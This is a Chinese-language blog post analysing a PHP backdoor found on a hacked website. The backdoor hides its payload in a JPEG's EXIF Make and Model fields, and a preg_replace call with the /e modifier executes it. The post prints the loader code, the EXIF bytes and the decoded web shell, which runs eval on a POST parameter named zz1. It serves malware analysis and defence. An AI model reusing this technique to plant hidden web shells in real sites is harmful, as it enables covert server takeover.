-
php木马 隐藏在JPG图片EXIF头部中的恶意软件
网络 2015/6/3 10:17:57几天前,我们研究团队的 Peter Gramantik 在一个被攻破的网站上发现一个非常有趣的后门。这个后门并没有依靠正常模式去隐藏起内容(比如 base64/gzip 编码),但是它却把自己的数据隐藏在 JPEG 图片的 EXIT 头部中了。它也使用 exif_read_data 和 preg_replace 两个 PHP 函数来读取 EXIF 头部和执行。
技术细节
这个后门可分为两部分。第一部分是 exif_read_data 函数读取图片头部,preg_replace 函数来执行内容。下面是我们在被攻破网站上发现的代码:
1
2
$exif= exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');preg_replace($exif['Make'],$exif['Model'],'');这两个函数本身是无害滴。exif_read_data 函数常用来读取图片,preg_replace 函数是替代字符内容。不过,preg_replace 函数函数有个隐藏并微妙的选项,如果你传入 “/e”,它会执行 eval() 中的内容,就不是去查询/替代了。
所以我们在查看 bun.jpg 文件时,发现后门的第二部分:
1
2
3
4
5
à^@^PJFIF^@^A^B^@^@d^@d^@^@á^@Exif^@^@II*^@^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));@ì^@^QDucky^@^A^@^D^@^@^@<^@^@帀@^NAdobe^这个文件用以常见的头部开始,但是在 ”make” 头部中混入了奇怪的关键字 ”/.*/e” 。有了这个执行修饰符, preg_replace 会执行 eval() 中传入的任意内容。
事情变得开始有趣了……
如果咱们继续来看看 EXIF 数据,我们能发现, ”eval ( base64_decode” 隐藏在 ”Model” 头部。把这些放在一起看,咱们就知道怎么回事了。攻击者是从 EXIF 中读取 Make 和 Model 头部信息,然后传入到 preg_replace 函数。只要我们修改 $exif['Make'] 和 $exif['Model'] ,就得到了最终的后门。
1
preg_replace ("/.*/e", ,"@ eval ( base64_decode("aWYgKGl ...");解码后我们可以看到是执行 $_POST["zz1"] 提供的内容。完整解码后的后面在这里。
1
if(isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]..隐藏恶意软件
另外一个有意思的是,虽然 bun.jpg 和其他图片文件被攻破了,但然后能加载并正常工作。实际上,在这些被攻破的站点,攻击者修改了站点上一个合法并之前就存在的图片。这是一种奇特的隐藏恶意软件的方法。
阅读(2561) 分享(0)
上一篇: 延长SSD(固态硬盘)寿命小技巧!
下一篇: 为什么iPhone只允许升级,不允许降级
